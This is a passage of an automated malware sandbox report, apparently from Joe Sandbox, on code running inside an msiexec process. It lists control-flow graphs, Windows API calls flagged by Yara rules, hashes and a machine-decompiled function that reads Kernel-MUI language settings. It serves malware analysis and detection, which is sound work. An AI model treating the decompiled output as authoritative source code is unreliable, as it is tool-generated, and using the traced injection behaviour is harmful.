                                            • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                            • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true
                                            • Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                            • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                            • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                            • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 135 98286-98288 136 9828a-9828c 135->136 137 982ee-9833a call ab850 call ac3f0 call 9acc0 call a4e10 135->137 136->137 147 9833c-9834e PostThreadMessageW 137->147 148 9836e-98372 137->148 149 9836d 147->149 150 98350-9836b call 9a450 PostThreadMessageW 147->150 149->148 150->149
                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0009834A
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0009836B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_90000_msiexec.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID: (
                                            • API String ID: 1836367815-3887548279
                                            • Opcode ID: 3003fe5868c96de53218c621c9b936f38735ddac68ca54658a4cecf11195dfd8
                                            • Instruction ID: 555c38e6c4b57b9c3d25110c6efe5121fc790f6043becedee5c484280c734d2f
                                            • Opcode Fuzzy Hash: 3003fe5868c96de53218c621c9b936f38735ddac68ca54658a4cecf11195dfd8
                                            • Instruction Fuzzy Hash: 69019B31A402187BEB60A6949C43FFE776CAF42B50F144518FE44BA1C2EAD56A0A47E6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 156 aa060-aa091 call aa950 RtlFreeHeap
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00093AF8), ref: 000AA08D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_90000_msiexec.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction ID: e323204c58ca745e5d44cd562f8689ea1b9c4a7588e8519be4ab138cc76ae66d
                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction Fuzzy Hash: 61E012B1200209ABDB18EF99CC49EA777ACAF88750F018558BA185B282C630E914CAB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 159 982b3-982b8 160 982ea 159->160 161 982ba-982dd call ab140 159->161 163 982ec-982f1 160->163 164 982f3-9833a call ab850 call ac3f0 call 9acc0 call a4e10 160->164 163->164 174 9833c-9834e PostThreadMessageW 164->174 175 9836e-98372 164->175 176 9836d 174->176 177 98350-9836b call 9a450 PostThreadMessageW 174->177 176->175 177->176
                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0009834A
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0009836B
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_90000_msiexec.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: ffebd6c5cd0b63d229a9f08d4911564446a0e5be8b8f1307e14344092a30e378
                                            • Instruction ID: 6840098f417bda584e80f4a9dab381ba8de13ad7066ce047309c414b5fccad66
                                            • Opcode Fuzzy Hash: ffebd6c5cd0b63d229a9f08d4911564446a0e5be8b8f1307e14344092a30e378
                                            • Instruction Fuzzy Hash: B511C831940224BBDB21A7989C02FEE7368BF42B50F154458FA04BF2C3E7A5AA0587E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 180 982e9-9833a call ab850 call ac3f0 call 9acc0 call a4e10 190 9833c-9834e PostThreadMessageW 180->190 191 9836e-98372 180->191 192 9836d 190->192 193 98350-9836b call 9a450 PostThreadMessageW 190->193 192->191 193->192
                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0009834A
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0009836B
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_90000_msiexec.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 636eb34337e7c344e61ad9b716489d8b53c43532a0902623b9219804138c3df3
                                            • Instruction ID: 60c62c4a7600a40bb746fefb0d481cd72070713fdaaaf42b1b9611d2fa2ff488
                                            • Opcode Fuzzy Hash: 636eb34337e7c344e61ad9b716489d8b53c43532a0902623b9219804138c3df3
                                            • Instruction Fuzzy Hash: E201D831A802187BEB20A6949C03FFE766C6B42B51F154158FF04BA2C3E6D56A0643E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 196 982f0-9833a call ab850 call ac3f0 call 9acc0 call a4e10 206 9833c-9834e PostThreadMessageW 196->206 207 9836e-98372 196->207 208 9836d 206->208 209 98350-9836b call 9a450 PostThreadMessageW 206->209 208->207 209->208
                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0009834A
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0009836B
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_90000_msiexec.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
                                            • Instruction ID: 3775376ca223d4126c1e209ca1cea65bf9cf806267cfabef4fb3205a5dd7ece0
                                            • Opcode Fuzzy Hash: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
                                            • Instruction Fuzzy Hash: 6C01A731A802287BEB20A6989C03FFE776C6B42F50F054118FF04BA1C2EAD46A0547F6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 407 aa231-aa232 408 aa1c7-aa1d9 407->408 409 aa234 407->409 412 aa1df-aa1f4 LookupPrivilegeValueW 408->412 413 aa1da call aa950 408->413 410 aa218-aa230 call aa950 409->410 411 aa236-aa267 call aa9c0 409->411 413->412
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0009F192,0009F192,?,00000000,?,?), ref: 000AA1F0
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_90000_msiexec.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 5a03e0d439bc587cf6d8f2d6a1aae73b66b7442a0b6c74102f1669eef416251d
                                            • Instruction ID: bf1dd09a43e006f7e37da9095fe59361ff0b1b61eb038178dbb992cf97dd2e12
                                            • Opcode Fuzzy Hash: 5a03e0d439bc587cf6d8f2d6a1aae73b66b7442a0b6c74102f1669eef416251d
                                            • Instruction Fuzzy Hash: 0911C8756042846FDB15EFB8DC91CDBBBA8DF43220B148989F8D847243C631E515CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 420 aa0d0-aa128 call aa950 CreateProcessInternalW
                                            APIs
                                            • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000AA124
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_90000_msiexec.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction ID: 1fa6533dc855de3041092aaa7ae1c9f909dd1f67f5c247ea3862a3c5d2809244
                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction Fuzzy Hash: 1101B2B2210108BFCB54DF89DC81EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 426 aa1b1-aa1da call aa950 428 aa1df-aa1f4 LookupPrivilegeValueW 426->428
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0009F192,0009F192,?,00000000,?,?), ref: 000AA1F0
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_90000_msiexec.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 0efb2b171b6206de05d9c5f2caa03bcfc09fc4014dc36b083393782b0a22da9d
                                            • Instruction ID: a7f68e833e32ec2be5f437396f2234ac5aaa1eebf11e4500e4aeec95ffb8291a
                                            • Opcode Fuzzy Hash: 0efb2b171b6206de05d9c5f2caa03bcfc09fc4014dc36b083393782b0a22da9d
                                            • Instruction Fuzzy Hash: BBF0E5B82042952BD711DF71D844ED33FA9DF42350F14419DF8991B143C134A41ACBB1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 429 aa1c0-aa1d9 430 aa1df-aa1f4 LookupPrivilegeValueW 429->430 431 aa1da call aa950 429->431 431->430
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0009F192,0009F192,?,00000000,?,?), ref: 000AA1F0
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_90000_msiexec.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction ID: 949f3d6754956acb4fb864f5626736197b2e15330137ffa63834fc1f1bbedb33
                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction Fuzzy Hash: D7E01AB16002086BDB10DF89CC85EE737ADAF89650F018154BA0C57242CA30E8148BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,00098CF4,?), ref: 0009F6BB
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_90000_msiexec.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                            • Instruction ID: 304b0250302ecd0ffa133cd0a1909b83658c2d3a4caa3817826ae4284b78d623
                                            • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                            • Instruction Fuzzy Hash: 35D0A9767903083BFA10FAE89C03F6632CCAB95B00F490074FA48EB3C3EAA0F4008165
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            C-Code - Quality: 94%
                                            			E02738788(signed int __ecx, void* __edx, signed int _a4) {
                                            				signed int _v8;
                                            				short* _v12;
                                            				void* _v16;
                                            				signed int _v20;
                                            				char _v24;
                                            				signed int _v28;
                                            				signed int _v32;
                                            				char _v36;
                                            				signed int _v40;
                                            				char _v44;
                                            				signed int _v48;
                                            				signed int _v52;
                                            				signed int _v56;
                                            				signed int _v60;
                                            				char _v68;
                                            				void* _t216;
                                            				intOrPtr _t231;
                                            				short* _t235;
                                            				intOrPtr _t257;
                                            				short* _t261;
                                            				intOrPtr _t284;
                                            				intOrPtr _t288;
                                            				void* _t314;
                                            				signed int _t318;
                                            				short* _t319;
                                            				intOrPtr _t321;
                                            				void* _t328;
                                            				void* _t329;
                                            				char* _t332;
                                            				signed int _t333;
                                            				signed int* _t334;
                                            				void* _t335;
                                            				void* _t338;
                                            				void* _t339;
                                            
                                            				_t328 = __edx;
                                            				_t322 = __ecx;
                                            				_t318 = 0;
                                            				_t334 = _a4;
                                            				_v8 = 0;
                                            				_v28 = 0;
                                            				_v48 = 0;
                                            				_v20 = 0;
                                            				_v40 = 0;
                                            				_v32 = 0;
                                            				_v52 = 0;
                                            				if(_t334 == 0) {
                                            					_t329 = 0xc000000d;
                                            					L49:
                                            					_t334[0x11] = _v56;
                                            					 *_t334 =  *_t334 | 0x00000800;
                                            					_t334[0x12] = _v60;
                                            					_t334[0x13] = _v28;
                                            					_t334[0x17] = _v20;
                                            					_t334[0x16] = _v48;
                                            					_t334[0x18] = _v40;
                                            					_t334[0x14] = _v32;
                                            					_t334[0x15] = _v52;
                                            					return _t329;
                                            				}
                                            				_v56 = 0;
                                            				if(E02738460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                            					_v56 = 1;
                                            					if(_v8 != 0) {
                                            						_t207 = E0271E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                            					}
                                            					_push(1);
                                            					_v8 = _t318;
                                            					E0273718A(_t207);
                                            					_t335 = _t335 + 4;
                                            				}
                                            				_v60 = _v60 | 0xffffffff;
                                            				if(E02738460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                            					_t333 =  *_v8;
                                            					_v60 = _t333;
                                            					_t314 = E0271E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                            					_push(_t333);
                                            					_v8 = _t318;
                                            					E0273718A(_t314);
                                            					_t335 = _t335 + 4;
                                            				}
                                            				_t216 = E02738460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                            				_t332 = ";";
                                            				if(_t216 < 0) {
                                            					L17:
                                            					if(E02738460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                            						L30:
                                            						if(E02738460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                            							L46:
                                            							_t329 = 0;
                                            							L47:
                                            							if(_v8 != _t318) {
                                            								E0271E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                            							}
                                            							if(_v28 != _t318) {
                                            								if(_v20 != _t318) {
                                            									E0271E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                            									_v20 = _t318;
                                            									_v40 = _t318;
                                            								}
                                            							}
                                            							goto L49;
                                            						}
                                            						_t231 = _v24;
                                            						_t322 = _t231 + 4;
                                            						_push(_t231);
                                            						_v52 = _t322;
                                            						E0273718A(_t231);
                                            						if(_t322 == _t318) {
                                            							_v32 = _t318;
                                            						} else {
                                            							_v32 = E0271E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                            						}
                                            						if(_v32 == _t318) {
                                            							_v52 = _t318;
                                            							L58:
                                            							_t329 = 0xc0000017;
                                            							goto L47;
                                            						} else {
                                            							E02712340(_v32, _v8, _v24);
                                            							_v16 = _v32;
                                            							_a4 = _t318;
                                            							_t235 = E0272E679(_v32, _t332);
                                            							while(1) {
                                            								_t319 = _t235;
                                            								if(_t319 == 0) {
                                            									break;
                                            								}
                                            								 *_t319 = 0;
                                            								_t321 = _t319 + 2;
                                            								E0271E2A8(_t322,  &_v68, _v16);
                                            								if(E02735553(_t328,  &_v68,  &_v36) != 0) {
                                            									_a4 = _a4 + 1;
                                            								}
                                            								_v16 = _t321;
                                            								_t235 = E0272E679(_t321, _t332);
                                            								_pop(_t322);
                                            							}
                                            							_t236 = _v16;
                                            							if( *_v16 != _t319) {
                                            								E0271E2A8(_t322,  &_v68, _t236);
                                            								if(E02735553(_t328,  &_v68,  &_v36) != 0) {
                                            									_a4 = _a4 + 1;
                                            								}
                                            							}
                                            							if(_a4 == 0) {
                                            								E0271E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                            								_v52 = _v52 & 0x00000000;
                                            								_v32 = _v32 & 0x00000000;
                                            							}
                                            							if(_v8 != 0) {
                                            								E0271E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                            							}
                                            							_v8 = _v8 & 0x00000000;
                                            							_t318 = 0;
                                            							goto L46;
                                            						}
                                            					}
                                            					_t257 = _v24;
                                            					_t322 = _t257 + 4;
                                            					_push(_t257);
                                            					_v40 = _t322;
                                            					E0273718A(_t257);
                                            					_t338 = _t335 + 4;
                                            					if(_t322 == _t318) {
                                            						_v20 = _t318;
                                            					} else {
                                            						_v20 = E0271E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                            					}
                                            					if(_v20 == _t318) {
                                            						_v40 = _t318;
                                            						goto L58;
                                            					} else {
                                            						E02712340(_v20, _v8, _v24);
                                            						_v16 = _v20;
                                            						_a4 = _t318;
                                            						_t261 = E0272E679(_v20, _t332);
                                            						_t335 = _t338 + 0x14;
                                            						while(1) {
                                            							_v12 = _t261;
                                            							if(_t261 == _t318) {
                                            								break;
                                            							}
                                            							_v12 = _v12 + 2;
                                            							 *_v12 = 0;
                                            							E0271E2A8(_v12,  &_v68, _v16);
                                            							if(E02735553(_t328,  &_v68,  &_v36) != 0) {
                                            								_a4 = _a4 + 1;
                                            							}
                                            							_v16 = _v12;
                                            							_t261 = E0272E679(_v12, _t332);
                                            							_pop(_t322);
                                            						}
                                            						_t269 = _v16;
                                            						if( *_v16 != _t318) {
                                            							E0271E2A8(_t322,  &_v68, _t269);
                                            							if(E02735553(_t328,  &_v68,  &_v36) != 0) {
                                            								_a4 = _a4 + 1;
                                            							}
                                            						}
                                            						if(_a4 == _t318) {
                                            							E0271E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                            							_v40 = _t318;
                                            							_v20 = _t318;
                                            						}
                                            						if(_v8 != _t318) {
                                            							E0271E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                            						}
                                            						_v8 = _t318;
                                            						goto L30;
                                            					}
                                            				}
                                            				_t284 = _v24;
                                            				_t322 = _t284 + 4;
                                            				_push(_t284);
                                            				_v48 = _t322;
                                            				E0273718A(_t284);
                                            				_t339 = _t335 + 4;
                                            				if(_t322 == _t318) {
                                            					_v28 = _t318;
                                            				} else {
                                            					_v28 = E0271E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                            				}
                                            				if(_v28 == _t318) {
                                            					_v48 = _t318;
                                            					goto L58;
                                            				} else {
                                            					E02712340(_v28, _v8, _v24);
                                            					_v16 = _v28;
                                            					_a4 = _t318;
                                            					_t288 = E0272E679(_v28, _t332);
                                            					_t335 = _t339 + 0x14;
                                            					while(1) {
                                            						_v12 = _t288;
                                            						if(_t288 == _t318) {
                                            							break;
                                            						}
                                            						_v12 = _v12 + 2;
                                            						 *_v12 = 0;
                                            						E0271E2A8(_v12,  &_v68, _v16);
                                            						if(E02735553(_t328,  &_v68,  &_v36) != 0) {
                                            							_a4 = _a4 + 1;
                                            						}
                                            						_v16 = _v12;
                                            						_t288 = E0272E679(_v12, _t332);
                                            						_pop(_t322);
                                            					}
                                            					_t296 = _v16;
                                            					if( *_v16 != _t318) {
                                            						E0271E2A8(_t322,  &_v68, _t296);
                                            						if(E02735553(_t328,  &_v68,  &_v36) != 0) {
                                            							_a4 = _a4 + 1;
                                            						}
                                            					}
                                            					if(_a4 == _t318) {
                                            						E0271E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                            						_v48 = _t318;
                                            						_v28 = _t318;
                                            					}
                                            					if(_v8 != _t318) {
                                            						E0271E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                            					}
                                            					_v8 = _t318;
                                            					goto L17;
                                            				}
                                            			}





































                                            0x02738788
                                            0x02738788
                                            0x02738791
                                            0x02738794
                                            0x02738798
                                            0x0273879b
                                            0x0273879e
                                            0x027387a1
                                            0x027387a4
                                            0x027387a7
                                            0x027387aa
                                            0x027387af
                                            0x02781ad3
                                            0x02738b0a
                                            0x02738b0d
                                            0x02738b13
                                            0x02738b19
                                            0x02738b1f
                                            0x02738b25
                                            0x02738b2b
                                            0x02738b31
                                            0x02738b37
                                            0x02738b3d
                                            0x02738b46
                                            0x02738b46
                                            0x027387c6
                                            0x027387d0
                                            0x02781ae0
                                            0x02781ae6
                                            0x02781af8
                                            0x02781af8
                                            0x02781afd
                                            0x02781afe
                                            0x02781b01
                                            0x02781b06
                                            0x02781b06
                                            0x027387d6
                                            0x027387f2
                                            0x027387f7
                                            0x02738807
                                            0x0273880a
                                            0x0273880f
                                            0x02738810
                                            0x02738813
                                            0x02738818
                                            0x02738818
                                            0x0273882c
                                            0x02738831
                                            0x02738838
                                            0x02738908
                                            0x02738920
                                            0x027389f0
                                            0x02738a08
                                            0x02738af6
                                            0x02738af6
                                            0x02738af8
                                            0x02738afb
                                            0x02781beb
                                            0x02781beb
                                            0x02738b04
                                            0x02781bf8
                                            0x02781c0e
                                            0x02781c13
                                            0x02781c16
                                            0x02781c16
                                            0x02781bf8
                                            0x00000000
                                            0x02738b04
                                            0x02738a0e
                                            0x02738a11
                                            0x02738a14
                                            0x02738a15
                                            0x02738a18
                                            0x02738a22
                                            0x02738b59
                                            0x02738a28
                                            0x02738a3c
                                            0x02738a3c
                                            0x02738a42
                                            0x02781bb0
                                            0x02781b11
                                            0x02781b11
                                            0x00000000
                                            0x02738a48
                                            0x02738a51
                                            0x02738a5b
                                            0x02738a5e
                                            0x02738a61
                                            0x02738a69
                                            0x02738a69
                                            0x02738a6d
                                            0x00000000
                                            0x00000000
                                            0x02738a74
                                            0x02738a7c
                                            0x02738a7d
                                            0x02738a91
                                            0x02738a93
                                            0x02738a93
                                            0x02738a98
                                            0x02738a9b
                                            0x02738aa1
                                            0x02738aa1
                                            0x02738aa4
                                            0x02738aaa
                                            0x02738ab1
                                            0x02738ac5
                                            0x02738ac7
                                            0x02738ac7
                                            0x02738ac5
                                            0x02738ace
                                            0x02781bc9
                                            0x02781bce
                                            0x02781bd2
                                            0x02781bd2
                                            0x02738ad8
                                            0x02738aeb
                                            0x02738aeb
                                            0x02738af0
                                            0x02738af4
                                            0x00000000
                                            0x02738af4
                                            0x02738a42
                                            0x02738926
                                            0x02738929
                                            0x0273892c
                                            0x0273892d
                                            0x02738930
                                            0x02738935
                                            0x0273893a
                                            0x02738b51
                                            0x02738940
                                            0x02738954
                                            0x02738954
                                            0x0273895a
                                            0x02781b63
                                            0x00000000
                                            0x02738960
                                            0x02738969
                                            0x02738973
                                            0x02738976
                                            0x02738979
                                            0x0273897e
                                            0x02738981
                                            0x02738981
                                            0x02738986
                                            0x00000000
                                            0x00000000
                                            0x02781b6e
                                            0x02781b74
                                            0x02781b7b
                                            0x02781b8f
                                            0x02781b91
                                            0x02781b91
                                            0x02781b99
                                            0x02781b9c
                                            0x02781ba2
                                            0x02781ba2
                                            0x0273898c
                                            0x02738992
                                            0x02738999
                                            0x027389ad
                                            0x02781ba8
                                            0x02781ba8
                                            0x027389ad
                                            0x027389b6
                                            0x027389c8
                                            0x027389cd
                                            0x027389d0
                                            0x027389d0
                                            0x027389d6
                                            0x027389e8
                                            0x027389e8
                                            0x027389ed
                                            0x00000000
                                            0x027389ed
                                            0x0273895a
                                            0x0273883e
                                            0x02738841
                                            0x02738844
                                            0x02738845
                                            0x02738848
                                            0x0273884d
                                            0x02738852
                                            0x02738b49
                                            0x02738858
                                            0x0273886c
                                            0x0273886c
                                            0x02738872
                                            0x02781b0e
                                            0x00000000
                                            0x02738878
                                            0x02738881
                                            0x0273888b
                                            0x0273888e
                                            0x02738891
                                            0x02738896
                                            0x02738899
                                            0x02738899
                                            0x0273889e
                                            0x00000000
                                            0x00000000
                                            0x02781b21
                                            0x02781b27
                                            0x02781b2e
                                            0x02781b42
                                            0x02781b44
                                            0x02781b44
                                            0x02781b4c
                                            0x02781b4f
                                            0x02781b55
                                            0x02781b55
                                            0x027388a4
                                            0x027388aa
                                            0x027388b1
                                            0x027388c5
                                            0x02781b5b
                                            0x02781b5b
                                            0x027388c5
                                            0x027388ce
                                            0x027388e0
                                            0x027388e5
                                            0x027388e8
                                            0x027388e8
                                            0x027388ee
                                            0x02738900
                                            0x02738900
                                            0x02738905
                                            0x00000000
                                            0x02738905

                                            APIs
                                            Strings
                                            • Kernel-MUI-Language-Allowed, xrefs: 02738827
                                            • Kernel-MUI-Language-SKU, xrefs: 027389FC
                                            • WindowsExcludedProcs, xrefs: 027387C1
                                            • Kernel-MUI-Language-Disallowed, xrefs: 02738914
                                            • Kernel-MUI-Number-Allowed, xrefs: 027387E6
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true
                                            • Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File
